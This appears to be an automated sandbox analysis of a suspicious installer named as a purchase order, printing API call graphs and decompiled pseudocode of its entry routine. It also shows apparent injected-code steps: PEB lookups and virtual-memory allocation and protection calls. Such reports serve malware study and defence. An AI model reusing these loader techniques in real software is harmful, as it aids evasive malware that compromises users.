17679->17685 17683 715d2655 10 API calls 17680->17683 17785 715d1666 17681->17785 17689 715d190f 17683->17689 17684 715d18b5 17780 715d1654 17684->17780 17760 715d2810 17685->17760 17688->17674 17688->17675 17696 715d1965 17689->17696 17791 715d2618 17689->17791 17693 715d2655 10 API calls 17693->17689 17695 715d1896 17695->17688 17696->17667 17698 715d196f GlobalFree 17696->17698 17697 715d1312 2 API calls 17700 715d18c1 GlobalFree 17697->17700 17698->17667 17700->17689 17702 715d1951 17702->17696 17704 715d15dd 3 API calls 17702->17704 17703 715d194a FreeLibrary 17703->17702 17704->17696 17705->17660 17795 715d12bb GlobalAlloc 17706->17795 17708 715d1c26 17796 715d12bb GlobalAlloc 17708->17796 17710 715d1e6b GlobalFree GlobalFree GlobalFree 17711 715d1e88 17710->17711 17723 715d1ed2 17710->17723 17712 715d227e 17711->17712 17720 715d1e9d 17711->17720 17711->17723 17714 715d22a0 GetModuleHandleW 17712->17714 17712->17723 17713 715d1d26 GlobalAlloc 17727 715d1c31 17713->17727 17717 715d22c6 17714->17717 17718 715d22b1 LoadLibraryW 17714->17718 17715 715d1d71 lstrcpyW 17719 715d1d7b lstrcpyW 17715->17719 17716 715d1d8f GlobalFree 17716->17727 17803 715d16bd WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 17717->17803 17718->17717 17718->17723 17719->17727 17720->17723 17799 715d12cc 17720->17799 17722 715d2126 17802 715d12bb GlobalAlloc 17722->17802 17723->17666 17724 715d2318 17724->17723 17726 715d2325 lstrlenW 17724->17726 17804 715d16bd WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 17726->17804 17727->17710 17727->17713 17727->17715 17727->17716 17727->17719 17727->17722 17727->17723 17732 715d2067 GlobalFree 17727->17732 17733 715d21ae 17727->17733 17734 715d12cc 2 API calls 17727->17734 17739 715d1dcd 17727->17739 17729 715d22d8 17729->17724 17738 715d2302 GetProcAddress 17729->17738 17730 715d212f 17730->17666 17732->17727 17733->17723 17737 715d2216 lstrcpyW 17733->17737 17734->17727 17735 715d233f 17735->17723 17737->17723 17738->17724 17739->17727 17797 715d162f GlobalSize GlobalAlloc 17739->17797 17747 715d2498 17740->17747 17741 715d12cc GlobalAlloc lstrcpynW 17741->17747 17743 715d25c1 GlobalFree 17744 715d186f 17743->17744 17743->17747 17744->17676 17744->17679 17744->17688 17745 715d256b GlobalAlloc CLSIDFromString 17745->17743 17746 715d2540 GlobalAlloc WideCharToMultiByte 17746->17743 17747->17741 17747->17743 17747->17745 17747->17746 17749 715d258a 17747->17749 17806 715d135a 17747->17806 17749->17743 17810 715d27a4 17749->17810 17751 715d2baa 17750->17751 17752 715d2c4f CreateFileA 17751->17752 17755 715d2c6d 17752->17755 17754 715d2d39 17754->17688 17813 715d2b42 17755->17813 17757 715d2453 17756->17757 17758 715d1868 17757->17758 17759 715d245e GlobalAlloc 17757->17759 17758->17668 17759->17757 17764 715d2840 17760->17764 17761 715d28ee 17763 715d28f4 GlobalSize 17761->17763 17765 715d28fe 17761->17765 17762 715d28db GlobalAlloc 17762->17765 17763->17765 17764->17761 17764->17762 17765->17695 17768 715d2e2e 17766->17768 17767 715d2e6e GlobalFree 17768->17767 17817 715d12bb GlobalAlloc 17769->17817 17771 715d26d8 MultiByteToWideChar 17774 715d265f 17771->17774 17772 715d270b lstrcpynW 17772->17774 17773 715d26fa StringFromGUID2 17773->17774 17774->17771 17774->17772 17774->17773 17775 715d271e wsprintfW 17774->17775 17776 715d2742 GlobalFree 17774->17776 17777 715d2777 GlobalFree 17774->17777 17778 715d1312 2 API calls 17774->17778 17818 715d1381 17774->17818 17775->17774 17776->17774 17777->17684 17778->17774 17822 715d12bb GlobalAlloc 17780->17822 17782 715d1659 17783 715d1666 2 API calls 17782->17783 17784 715d1663 17783->17784 17784->17697 17787 715d1672 wsprintfW 17785->17787 17789 715d169f lstrcpyW 17785->17789 17790 715d16b8 17787->17790 17789->17790 17790->17693 17792 715d1931 17791->17792 17793 715d2626 17791->17793 17792->17702 17792->17703 17793->17792 17794 715d2642 GlobalFree 17793->17794 17794->17793 17795->17708 17796->17727 17798 715d164d 17797->17798 17798->17739 17805 715d12bb GlobalAlloc 17799->17805 17801 715d12db lstrcpynW 17801->17723 17802->17730 17803->17729 17804->17735 17805->17801 17807 715d1361 17806->17807 17808 715d12cc 2 API calls 17807->17808 17809 715d137f 17808->17809 17809->17747 17811 715d2808 17810->17811 17812 715d27b2 VirtualAlloc 17810->17812 17811->17749 17812->17811 17814 715d2b4d 17813->17814 17815 715d2b5d 17814->17815 17816 715d2b52 GetLastError 17814->17816 17815->17754 17816->17815 17817->17774 17819 715d13ac 17818->17819 17820 715d138a 17818->17820 17819->17774 17820->17819 17821 715d1390 lstrcpyW 17820->17821 17821->17819 17822->17782 17985 3c746bf 17986 3c746d7 17985->17986 17990 3c7470b 17986->17990 17992 3c7f205 17986->17992 17988 3c74961 17996 3c7e542 GetPEB 17988->17996 17991 3c74966 17993 3c7f21f 17992->17993 17993->17988 17993->17993 17997 3c81659 17993->17997 17995 3c7f2da 17995->17988 17996->17991 17998 3c816ed 17997->17998 17999 3c81739 LoadLibraryA 17998->17999 18000 3c81e75 GetPEB 17998->18000 18001 3c81741 17999->18001 18002 3c8171c 18000->18002 18001->17995 18002->17999 17823 40175c 17824 402da6 17 API calls 17823->17824 17825 401763 17824->17825 17826 406187 2 API calls 17825->17826 17827 40176a 17826->17827 17828 406187 2 API calls 17827->17828 17828->17827 18003 3c807f4 18004 3c8083e 18003->18004 18009 3c822af 18004->18009 18006 3c808b2 18016 3c80a41 18006->18016 18008 3c8090f 18010 3c822cf 18009->18010 18012 3c825f6 18009->18012 18011 3c81659 2 API calls 18010->18011 18014 3c8238f 18011->18014 18012->18006 18013 3c7398f 18014->18013 18015 3c825b8 NtAllocateVirtualMemory 18014->18015 18015->18012 18017 3c80a91 CreateFileA 18016->18017 18017->18008 17829 401ede 17830 402d84 17 API calls 17829->17830 17831 401ee4 17830->17831 17832 402d84 17 API calls 17831->17832 17833 401ef0 17832->17833 17834 401f07 EnableWindow 17833->17834 17835 401efc ShowWindow 17833->17835 17836 402c2a 17834->17836 17835->17836 17837 3c79758 17841 3c83362 17837->17841 17839 3c79737 17839->17837 17840 3c7978e 17839->17840 17842 3c833ae GetPEB 17841->17842 17843 3c81659 17842->17843 17844 3c833e1 17842->17844 17845 3c81739 LoadLibraryA 17843->17845 17863 3c81e75 GetPEB 17843->17863 17865 3c842ae 17844->17865 17848 3c81741 17845->17848 17848->17839 17849 3c8171c 17849->17845 17850 3c83ca5 17850->17839 17851 3c83ca8 17856 3c84023 17851->17856 17859 3c83d8f 17851->17859 17852 3c83465 17852->17843 17852->17850 17852->17851 17860 3c83831 17852->17860 17853 3c842ae NtProtectVirtualMemory 17854 3c8425d 17853->17854 17854->17839 17855 3c7398f 17856->17853 17856->17855 17857 3c842ae NtProtectVirtualMemory 17858 3c8401e 17857->17858 17858->17839 17859->17857 17861 3c85184 17859->17861 17860->17860 17862 3c842ae NtProtectVirtualMemory 17860->17862 17861->17839 17862->17850 17864 3c81ecf 17863->17864 17864->17849 17866 3c842ff NtProtectVirtualMemory 17865->17866 17868 3c85184 17865->17868 17866->17852 17868->17852 18019 4022ff 18020 402da6 17 API calls 18019->18020 18021 402305 18020->18021 18022 402da6 17 API calls 18021->18022 18023 40230e 18022->18023 18024 402da6 17 API calls 18023->18024 18025 402317 18024->18025 18026 40699e 2 API calls 18025->18026 18027 402320 18026->18027 18028 402331 lstrlenW lstrlenW 18027->18028 18029 402324 18027->18029 18031 4056ca 24 API calls 18028->18031 18030 4056ca 24 API calls 18029->18030 18033 40232c 18029->18033 18030->18033 18032 40236f SHFileOperationW 18031->18032 18032->18029 18032->18033

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 0 403640-403690 SetErrorMode GetVersionExW 1 403692-4036c6 GetVersionExW 0->1 2 4036ca-4036d1 0->2 1->2 3 4036d3 2->3 4 4036db-40371b 2->4 3->4 5 40371d-403725 call 406a35 4->5 6 40372e 4->6 5->6 11 403727 5->11 8 403733-403747 call 4069c5 lstrlenA 6->8 13 403749-403765 call 406a35 * 3 8->13 11->6 20 403776-4037d8 #17 OleInitialize SHGetFileInfoW call 406668 GetCommandLineW call 406668 13->20 21 403767-40376d 13->21 28 4037e1-4037f4 call 405f64 CharNextW 20->28 29 4037da-4037dc 20->29 21->20 25 40376f 21->25 25->20 32 4038eb-4038f1 28->32 29->28 33 4038f7 32->33 34 4037f9-4037ff 32->34 37 40390b-403925 GetTempPathW call 40360f 33->37 35 403801-403806 34->35 36 403808-40380e 34->36 35->35 35->36 38 403810-403814 36->38 39 403815-403819 36->39 47 403927-403945 GetWindowsDirectoryW lstrcatW call 40360f 37->47 48 40397d-403995 DeleteFileW call 4030d0 37->48 38->39 41 4038d9-4038e7 call 405f64 39->41 42 40381f-403825 39->42 41->32 56 4038e9-4038ea 41->56 45 403827-40382e 42->45 46 40383f-403878 42->46 51 403830-403833 45->51 52 403835 45->52 53 403894-4038ce 46->53 54 40387a-40387f 46->54 47->48 67 403947-403977 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 40360f 47->67 63 40399b-4039a1 48->63 64 403b6c-403b7a call 403c25 OleUninitialize 48->64 51->46 51->52 52->46 60 4038d0-4038d4 53->60 61 4038d6-4038d8 53->61 54->53 58 403881-403889 54->58 56->32 65 403890 58->65 66 40388b-40388e 58->66 60->61 62 4038f9-403906 call 406668 60->62 61->41 62->37 69 4039a7-4039ba call 405f64 63->69 70 403a48-403a4f call 403d17 63->70 79 403b91-403b97 64->79 80 403b7c-403b8b call 405cc8 ExitProcess 64->80 65->53 66->53 66->65 67->48 67->64 83 403a0c-403a19 69->83 84 4039bc-4039f1 69->84 78 403a54-403a57 70->78 78->64 81 403b99-403bae GetCurrentProcess OpenProcessToken 79->81 82 403c0f-403c17 79->82 87 403bb0-403bd9 LookupPrivilegeValueW AdjustTokenPrivileges 81->87 88 403bdf-403bed call 406a35 81->88 90 403c19 82->90 91 403c1c-403c1f ExitProcess 82->91 92 403a1b-403a29 call 40603f 83->92 93 403a5c-403a70 call 405c33 lstrcatW 83->93 89 4039f3-4039f7 84->89 87->88 104 403bfb-403c06 ExitWindowsEx 88->104 105 403bef-403bf9 88->105 96 403a00-403a08 89->96 97 4039f9-4039fe 89->97 90->91 92->64 103 403a2f-403a45 call 406668 * 2 92->103 106 403a72-403a78 lstrcatW 93->106 107 403a7d-403a97 lstrcatW lstrcmpiW 93->107 96->89 101 403a0a 96->101 97->96 97->101 101->83 103->70 104->82 109 403c08-403c0a call 40140b 104->109 105->104 105->109 106->107 110 403b6a 107->110 111 403a9d-403aa0 107->111 109->82 110->64 112 403aa2-403aa7 call 405b99 111->112 113 403aa9 call 405c16 111->113 121 403aae-403abe SetCurrentDirectoryW 112->121 113->121 123 403ac0-403ac6 call 406668 121->123 124 403acb-403af7 call 406668 121->124 123->124 128 403afc-403b17 call 4066a5 DeleteFileW 124->128 131 403b57-403b61 128->131 132 403b19-403b29 CopyFileW 128->132 131->128 133 403b63-403b65 call 406428 131->133 132->131 134 403b2b-403b4b call 406428 call 4066a5 call 405c4b 132->134 133->110 134->131 142 403b4d-403b54 CloseHandle 134->142 142->131
                                                                                      C-Code - Quality: 79%
                                                                                      			_entry_() {
                                                                                      				WCHAR* _v8;
                                                                                      				signed int _v12;
                                                                                      				void* _v16;
                                                                                      				signed int _v20;
                                                                                      				int _v24;
                                                                                      				int _v28;
                                                                                      				struct _TOKEN_PRIVILEGES _v40;
                                                                                      				signed char _v42;
                                                                                      				int _v44;
                                                                                      				signed int _v48;
                                                                                      				intOrPtr _v278;
                                                                                      				signed short _v310;
                                                                                      				struct _OSVERSIONINFOW _v324;
                                                                                      				struct _SHFILEINFOW _v1016;
                                                                                      				intOrPtr* _t88;
                                                                                      				WCHAR* _t92;
                                                                                      				char* _t94;
                                                                                      				void _t97;
                                                                                      				void* _t116;
                                                                                      				WCHAR* _t118;
                                                                                      				signed int _t120;
                                                                                      				intOrPtr* _t124;
                                                                                      				void* _t138;
                                                                                      				void* _t144;
                                                                                      				void* _t149;
                                                                                      				void* _t153;
                                                                                      				void* _t158;
                                                                                      				signed int _t168;
                                                                                      				void* _t171;
                                                                                      				void* _t176;
                                                                                      				intOrPtr _t178;
                                                                                      				intOrPtr _t179;
                                                                                      				intOrPtr* _t180;
                                                                                      				int _t189;
                                                                                      				void* _t190;
                                                                                      				void* _t199;
                                                                                      				signed int _t205;
                                                                                      				signed int _t210;
                                                                                      				signed int _t215;
                                                                                      				signed int _t217;
                                                                                      				int* _t219;
                                                                                      				signed int _t227;
                                                                                      				signed int _t230;
                                                                                      				CHAR* _t232;
                                                                                      				char* _t233;
                                                                                      				signed int _t234;
                                                                                      				WCHAR* _t235;
                                                                                      				void* _t251;
                                                                                      
                                                                                      				_t217 = 0x20;
                                                                                      				_t189 = 0;
                                                                                      				_v24 = 0;
                                                                                      				_v8 = L"Error writing temporary file. Make sure your temp folder is valid.";
                                                                                      				_v20 = 0;
                                                                                      				SetErrorMode(0x8001); // executed
                                                                                      				_v324.szCSDVersion = 0;
                                                                                      				_v48 = 0;
                                                                                      				_v44 = 0;
                                                                                      				_v324.dwOSVersionInfoSize = 0x11c;
                                                                                      				if(GetVersionExW( &_v324) == 0) {
                                                                                      					_v324.dwOSVersionInfoSize = 0x114;
                                                                                      					GetVersionExW( &_v324);
                                                                                      					asm("sbb eax, eax");
                                                                                      					_v42 = 4;
                                                                                      					_v48 =  !( ~(_v324.szCSDVersion - 0x53)) & _v278 + 0xffffffd0;
                                                                                      				}
                                                                                      				if(_v324.dwMajorVersion < 0xa) {
                                                                                      					_v310 = _v310 & 0x00000000;
                                                                                      				}
                                                                                      				 *0x42a318 = _v324.dwBuildNumber;
                                                                                      				 *0x42a31c = (_v324.dwMajorVersion & 0x0000ffff | _v324.dwMinorVersion & 0x000000ff) << 0x00000010 | _v48 & 0x0000ffff | _v42 & 0x000000ff;
                                                                                      				if( *0x42a31e != 0x600) {
                                                                                      					_t180 = E00406A35(_t189);
                                                                                      					if(_t180 != _t189) {
                                                                                      						 *_t180(0xc00);
                                                                                      					}
                                                                                      				}
                                                                                      				_t232 = "UXTHEME";
                                                                                      				do {
                                                                                      					E004069C5(_t232); // executed
                                                                                      					_t232 =  &(_t232[lstrlenA(_t232) + 1]);
                                                                                      				} while ( *_t232 != 0);
                                                                                      				E00406A35(0xb);
                                                                                      				 *0x42a264 = E00406A35(9);
                                                                                      				_t88 = E00406A35(7);
                                                                                      				if(_t88 != _t189) {
                                                                                      					_t88 =  *_t88(0x1e);
                                                                                      					if(_t88 != 0) {
                                                                                      						 *0x42a31c =  *0x42a31c | 0x00000080;
                                                                                      					}
                                                                                      				}
                                                                                      				__imp__#17();
                                                                                      				__imp__OleInitialize(_t189); // executed
                                                                                      				 *0x42a320 = _t88;
                                                                                      				SHGetFileInfoW(0x421708, _t189,  &_v1016, 0x2b4, _t189); // executed
                                                                                      				E00406668(0x429260, L"NSIS Error");
                                                                                      				_t92 = GetCommandLineW();
                                                                                      				_t233 = L"\"C:\\Users\\Arthur\\Desktop\\PO#4200000866.exe\" ";
                                                                                      				E00406668(_t233, _t92);
                                                                                      				_t94 = _t233;
                                                                                      				_t234 = 0x22;
                                                                                      				 *0x42a260 = 0x400000;
                                                                                      				_t251 = L"\"C:\\Users\\Arthur\\Desktop\\PO#4200000866.exe\" " - _t234; // 0x22
                                                                                      				if(_t251 == 0) {
                                                                                      					_t217 = _t234;
                                                                                      					_t94 =  &M00435002;
                                                                                      				}
                                                                                      				_t199 = CharNextW(E00405F64(_t94, _t217));
                                                                                      				_v16 = _t199;
                                                                                      				while(1) {
                                                                                      					_t97 =  *_t199;
                                                                                      					_t252 = _t97 - _t189;
                                                                                      					if(_t97 == _t189) {
                                                                                      						break;
                                                                                      					}
                                                                                      					_t210 = 0x20;
                                                                                      					__eflags = _t97 - _t210;
                                                                                      					if(_t97 != _t210) {
                                                                                      						L17:
                                                                                      						__eflags =  *_t199 - _t234;
                                                                                      						_v12 = _t210;
                                                                                      						if( *_t199 == _t234) {
                                                                                      							_v12 = _t234;
                                                                                      							_t199 = _t199 + 2;
                                                                                      							__eflags = _t199;
                                                                                      						}
                                                                                      						__eflags =  *_t199 - 0x2f;
                                                                                      						if( *_t199 != 0x2f) {
                                                                                      							L32:
                                                                                      							_t199 = E00405F64(_t199, _v12);
                                                                                      							__eflags =  *_t199 - _t234;
                                                                                      							if(__eflags == 0) {
                                                                                      								_t199 = _t199 + 2;
                                                                                      								__eflags = _t199;
                                                                                      							}
                                                                                      							continue;
                                                                                      						} else {
                                                                                      							_t199 = _t199 + 2;
                                                                                      							__eflags =  *_t199 - 0x53;
                                                                                      							if( *_t199 != 0x53) {
                                                                                      								L24:
                                                                                      								asm("cdq");
                                                                                      								asm("cdq");
                                                                                      								_t215 = L"NCRC" & 0x0000ffff;
                                                                                      								asm("cdq");
                                                                                      								_t227 = ( *0x40a37e & 0x0000ffff) << 0x00000010 |  *0x40a37c & 0x0000ffff | _t215;
                                                                                      								__eflags =  *_t199 - (( *0x40a37a & 0x0000ffff) << 0x00000010 | _t215);
                                                                                      								if( *_t199 != (( *0x40a37a & 0x0000ffff) << 0x00000010 | _t215)) {
                                                                                      									L29:
                                                                                      									asm("cdq");
                                                                                      									asm("cdq");
                                                                                      									_t210 = L" /D=" & 0x0000ffff;
                                                                                      									asm("cdq");
                                                                                      									_t230 = ( *0x40a372 & 0x0000ffff) << 0x00000010 |  *0x40a370 & 0x0000ffff | _t210;
                                                                                      									__eflags =  *(_t199 - 4) - (( *0x40a36e & 0x0000ffff) << 0x00000010 | _t210);
                                                                                      									if( *(_t199 - 4) != (( *0x40a36e & 0x0000ffff) << 0x00000010 | _t210)) {
                                                                                      										L31:
                                                                                      										_t234 = 0x22;
                                                                                      										goto L32;
                                                                                      									}
                                                                                      									__eflags =  *_t199 - _t230;
                                                                                      									if( *_t199 == _t230) {
                                                                                      										 *(_t199 - 4) = _t189;
                                                                                      										__eflags = _t199;
                                                                                      										E00406668(L"C:\\Users\\Arthur\\AppData\\Local\\Temp", _t199);
                                                                                      										L37:
                                                                                      										_t235 = L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\";
                                                                                      										GetTempPathW(0x400, _t235);
                                                                                      										_t116 = E0040360F(_t199, _t252);
                                                                                      										_t253 = _t116;
                                                                                      										if(_t116 != 0) {
                                                                                      											L40:
                                                                                      											DeleteFileW(L"1033"); // executed
                                                                                      											_t118 = E004030D0(_t255, _v20); // executed
                                                                                      											_v8 = _t118;
                                                                                      											if(_t118 != _t189) {
                                                                                      												L68:
                                                                                      												E00403C25();
                                                                                      												__imp__OleUninitialize();
                                                                                      												if(_v8 == _t189) {
                                                                                      													if( *0x42a2f4 == _t189) {
                                                                                      														L77:
                                                                                      														_t120 =  *0x42a30c;
                                                                                      														if(_t120 != 0xffffffff) {
                                                                                      															_v24 = _t120;
                                                                                      														}
                                                                                      														ExitProcess(_v24);
                                                                                      													}
                                                                                      													if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v16) != 0) {
                                                                                      														LookupPrivilegeValueW(_t189, L"SeShutdownPrivilege",  &(_v40.Privileges));
                                                                                      														_v40.PrivilegeCount = 1;
                                                                                      														_v28 = 2;
                                                                                      														AdjustTokenPrivileges(_v16, _t189,  &_v40, _t189, _t189, _t189);
                                                                                      													}
                                                                                      													_t124 = E00406A35(4);
                                                                                      													if(_t124 == _t189) {
                                                                                      														L75:
                                                                                      														if(ExitWindowsEx(2, 0x80040002) != 0) {
                                                                                      															goto L77;
                                                                                      														}
                                                                                      														goto L76;
                                                                                      													} else {
                                                                                      														_push(0x80040002);
                                                                                      														_push(0x25);
                                                                                      														_push(_t189);
                                                                                      														_push(_t189);
                                                                                      														_push(_t189);
                                                                                      														if( *_t124() == 0) {
                                                                                      															L76:
                                                                                      															E0040140B(9);
                                                                                      															goto L77;
                                                                                      														}
                                                                                      														goto L75;
                                                                                      													}
                                                                                      												}
                                                                                      												E00405CC8(_v8, 0x200010);
                                                                                      												ExitProcess(2);
                                                                                      											}
                                                                                      											if( *0x42a27c == _t189) {
                                                                                      												L51:
                                                                                      												 *0x42a30c =  *0x42a30c | 0xffffffff;
                                                                                      												_v24 = E00403D17(_t265);
                                                                                      												goto L68;
                                                                                      											}
                                                                                      											_t219 = E00405F64(L"\"C:\\Users\\Arthur\\Desktop\\PO#4200000866.exe\" ", _t189);
                                                                                      											if(_t219 < L"\"C:\\Users\\Arthur\\Desktop\\PO#4200000866.exe\" ") {
                                                                                      												L48:
                                                                                      												_t264 = _t219 - L"\"C:\\Users\\Arthur\\Desktop\\PO#4200000866.exe\" ";
                                                                                      												_v8 = L"Error launching installer";
                                                                                      												if(_t219 < L"\"C:\\Users\\Arthur\\Desktop\\PO#4200000866.exe\" ") {
                                                                                      													_t190 = E00405C33(__eflags);
                                                                                      													lstrcatW(_t235, L"~nsu");
                                                                                      													__eflags = _t190;
                                                                                      													if(_t190 != 0) {
                                                                                      														lstrcatW(_t235, "A");
                                                                                      													}
                                                                                      													lstrcatW(_t235, L".tmp");
                                                                                      													_t220 = L"C:\\Users\\Arthur\\Desktop";
                                                                                      													_t138 = lstrcmpiW(_t235, L"C:\\Users\\Arthur\\Desktop");
                                                                                      													__eflags = _t138;
                                                                                      													if(_t138 == 0) {
                                                                                      														L67:
                                                                                      														_t189 = 0;
                                                                                      														__eflags = 0;
                                                                                      														goto L68;
                                                                                      													} else {
                                                                                      														__eflags = _t190;
                                                                                      														_push(_t235);
                                                                                      														if(_t190 == 0) {
                                                                                      															E00405C16();
                                                                                      														} else {
                                                                                      															E00405B99();
                                                                                      														}
                                                                                      														SetCurrentDirectoryW(_t235);
                                                                                      														__eflags = L"C:\\Users\\Arthur\\AppData\\Local\\Temp"; // 0x43
                                                                                      														if(__eflags == 0) {
                                                                                      															E00406668(L"C:\\Users\\Arthur\\AppData\\Local\\Temp", _t220);
                                                                                      														}
                                                                                      														E00406668(0x42b000, _v16);
                                                                                      														_t202 = "A" & 0x0000ffff;
                                                                                      														_t144 = ( *0x40a316 & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
                                                                                      														__eflags = _t144;
                                                                                      														_v12 = 0x1a;
                                                                                      														 *0x42b800 = _t144;
                                                                                      														do {
                                                                                      															E004066A5(0, 0x420f08, _t235, 0x420f08,  *((intOrPtr*)( *0x42a270 + 0x120)));
                                                                                      															DeleteFileW(0x420f08);
                                                                                      															__eflags = _v8;
                                                                                      															if(_v8 != 0) {
                                                                                      																_t149 = CopyFileW(L"C:\\Users\\Arthur\\Desktop\\PO#4200000866.exe", 0x420f08, 1);
                                                                                      																__eflags = _t149;
                                                                                      																if(_t149 != 0) {
                                                                                      																	E00406428(_t202, 0x420f08, 0);
                                                                                      																	E004066A5(0, 0x420f08, _t235, 0x420f08,  *((intOrPtr*)( *0x42a270 + 0x124)));
                                                                                      																	_t153 = E00405C4B(0x420f08);
                                                                                      																	__eflags = _t153;
                                                                                      																	if(_t153 != 0) {
                                                                                      																		CloseHandle(_t153);
                                                                                      																		_v8 = 0;
                                                                                      																	}
                                                                                      																}
                                                                                      															}
                                                                                      															 *0x42b800 =  *0x42b800 + 1;
                                                                                      															_t61 =  &_v12;
                                                                                      															 *_t61 = _v12 - 1;
                                                                                      															__eflags =  *_t61;
                                                                                      														} while ( *_t61 != 0);
                                                                                      														E00406428(_t202, _t235, 0);
                                                                                      														goto L67;
                                                                                      													}
                                                                                      												}
                                                                                      												 *_t219 = _t189;
                                                                                      												_t222 =  &(_t219[2]);
                                                                                      												_t158 = E0040603F(_t264,  &(_t219[2]));
                                                                                      												_t265 = _t158;
                                                                                      												if(_t158 == 0) {
                                                                                      													goto L68;
                                                                                      												}
                                                                                      												E00406668(L"C:\\Users\\Arthur\\AppData\\Local\\Temp", _t222);
                                                                                      												E00406668(L"C:\\Users\\Arthur\\AppData\\Local\\Temp", _t222);
                                                                                      												_v8 = _t189;
                                                                                      												goto L51;
                                                                                      											}
                                                                                      											asm("cdq");
                                                                                      											asm("cdq");
                                                                                      											asm("cdq");
                                                                                      											_t205 = ( *0x40a33a & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
                                                                                      											_t168 = ( *0x40a33e & 0x0000ffff) << 0x00000010 |  *0x40a33c & 0x0000ffff | (_t210 << 0x00000020 |  *0x40a33e & 0x0000ffff) << 0x10;
                                                                                      											while( *_t219 != _t205 || _t219[1] != _t168) {
                                                                                      												_t219 = _t219;
                                                                                      												if(_t219 >= L"\"C:\\Users\\Arthur\\Desktop\\PO#4200000866.exe\" ") {
                                                                                      													continue;
                                                                                      												}
                                                                                      												break;
                                                                                      											}
                                                                                      											_t189 = 0;
                                                                                      											goto L48;
                                                                                      										}
                                                                                      										GetWindowsDirectoryW(_t235, 0x3fb);
                                                                                      										lstrcatW(_t235, L"\\Temp");
                                                                                      										_t171 = E0040360F(_t199, _t253);
                                                                                      										_t254 = _t171;
                                                                                      										if(_t171 != 0) {
                                                                                      											goto L40;
                                                                                      										}
                                                                                      										GetTempPathW(0x3fc, _t235);
                                                                                      										lstrcatW(_t235, L"Low");
                                                                                      										SetEnvironmentVariableW(L"TEMP", _t235);
                                                                                      										SetEnvironmentVariableW(L"TMP", _t235);
                                                                                      										_t176 = E0040360F(_t199, _t254);
                                                                                      										_t255 = _t176;
                                                                                      										if(_t176 == 0) {
                                                                                      											goto L68;
                                                                                      										}
                                                                                      										goto L40;
                                                                                      									}
                                                                                      									goto L31;
                                                                                      								}
                                                                                      								__eflags =  *((intOrPtr*)(_t199 + 4)) - _t227;
                                                                                      								if( *((intOrPtr*)(_t199 + 4)) != _t227) {
                                                                                      									goto L29;
                                                                                      								}
                                                                                      								_t178 =  *((intOrPtr*)(_t199 + 8));
                                                                                      								__eflags = _t178 - 0x20;
                                                                                      								if(_t178 == 0x20) {
                                                                                      									L28:
                                                                                      									_t36 =  &_v20;
                                                                                      									 *_t36 = _v20 | 0x00000004;
                                                                                      									__eflags =  *_t36;
                                                                                      									goto L29;
                                                                                      								}
                                                                                      								__eflags = _t178 - _t189;
                                                                                      								if(_t178 != _t189) {
                                                                                      									goto L29;
                                                                                      								}
                                                                                      								goto L28;
                                                                                      							}
                                                                                      							_t179 =  *((intOrPtr*)(_t199 + 2));
                                                                                      							__eflags = _t179 - _t210;
                                                                                      							if(_t179 == _t210) {
                                                                                      								L23:
                                                                                      								 *0x42a300 = 1;
                                                                                      								goto L24;
                                                                                      							}
                                                                                      							__eflags = _t179 - _t189;
                                                                                      							if(_t179 != _t189) {
                                                                                      								goto L24;
                                                                                      							}
                                                                                      							goto L23;
                                                                                      						}
                                                                                      					} else {
                                                                                      						goto L16;
                                                                                      					}
                                                                                      					do {
                                                                                      						L16:
                                                                                      						_t199 = _t199 + 2;
                                                                                      						__eflags =  *_t199 - _t210;
                                                                                      					} while ( *_t199 == _t210);
                                                                                      					goto L17;
                                                                                      				}
                                                                                      				goto L37;
                                                                                      			}



















































                                                                                      0x0040364e
                                                                                      0x0040364f
                                                                                      0x00403656
                                                                                      0x00403659
                                                                                      0x00403660
                                                                                      0x00403663
                                                                                      0x00403676
                                                                                      0x0040367c
                                                                                      0x0040367f
                                                                                      0x00403682
                                                                                      0x00403690
                                                                                      0x00403698
                                                                                      0x004036a3
                                                                                      0x004036bc
                                                                                      0x004036be
                                                                                      0x004036c6
                                                                                      0x004036c6
                                                                                      0x004036d1
                                                                                      0x004036d3
                                                                                      0x004036d3
                                                                                      0x004036e8
                                                                                      0x0040370d
                                                                                      0x0040371b
                                                                                      0x0040371e
                                                                                      0x00403725
                                                                                      0x0040372c
                                                                                      0x0040372c
                                                                                      0x00403725
                                                                                      0x0040372e
                                                                                      0x00403733
                                                                                      0x00403734
                                                                                      0x00403740
                                                                                      0x00403744
                                                                                      0x0040374b
                                                                                      0x00403759
                                                                                      0x0040375e
                                                                                      0x00403765
                                                                                      0x00403769
                                                                                      0x0040376d
                                                                                      0x0040376f
                                                                                      0x0040376f
                                                                                      0x0040376d
                                                                                      0x00403776
                                                                                      0x0040377d
                                                                                      0x00403783
                                                                                      0x0040379b
                                                                                      0x004037ab
                                                                                      0x004037b0
                                                                                      0x004037b6
                                                                                      0x004037bd
                                                                                      0x004037c4
                                                                                      0x004037c6
                                                                                      0x004037c7
                                                                                      0x004037d1
                                                                                      0x004037d8
                                                                                      0x004037da
                                                                                      0x004037dc
                                                                                      0x004037dc
                                                                                      0x004037ef
                                                                                      0x004037f1
                                                                                      0x004038eb
                                                                                      0x004038eb
                                                                                      0x004038ee
                                                                                      0x004038f1
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004037fb
                                                                                      0x004037fc
                                                                                      0x004037ff
                                                                                      0x00403808
                                                                                      0x00403808
                                                                                      0x0040380b
                                                                                      0x0040380e
                                                                                      0x00403811
                                                                                      0x00403814
                                                                                      0x00403814
                                                                                      0x00403814
                                                                                      0x00403815
                                                                                      0x00403819
                                                                                      0x004038d9
                                                                                      0x004038e2
                                                                                      0x004038e4
                                                                                      0x004038e7
                                                                                      0x004038ea
                                                                                      0x004038ea
                                                                                      0x004038ea
                                                                                      0x00000000
                                                                                      0x0040381f
                                                                                      0x00403820
                                                                                      0x00403821
                                                                                      0x00403825
                                                                                      0x0040383f
                                                                                      0x00403846
                                                                                      0x00403859
                                                                                      0x0040385a
                                                                                      0x0040386f
                                                                                      0x00403874
                                                                                      0x00403876
                                                                                      0x00403878
                                                                                      0x00403894
                                                                                      0x0040389b
                                                                                      0x004038ae
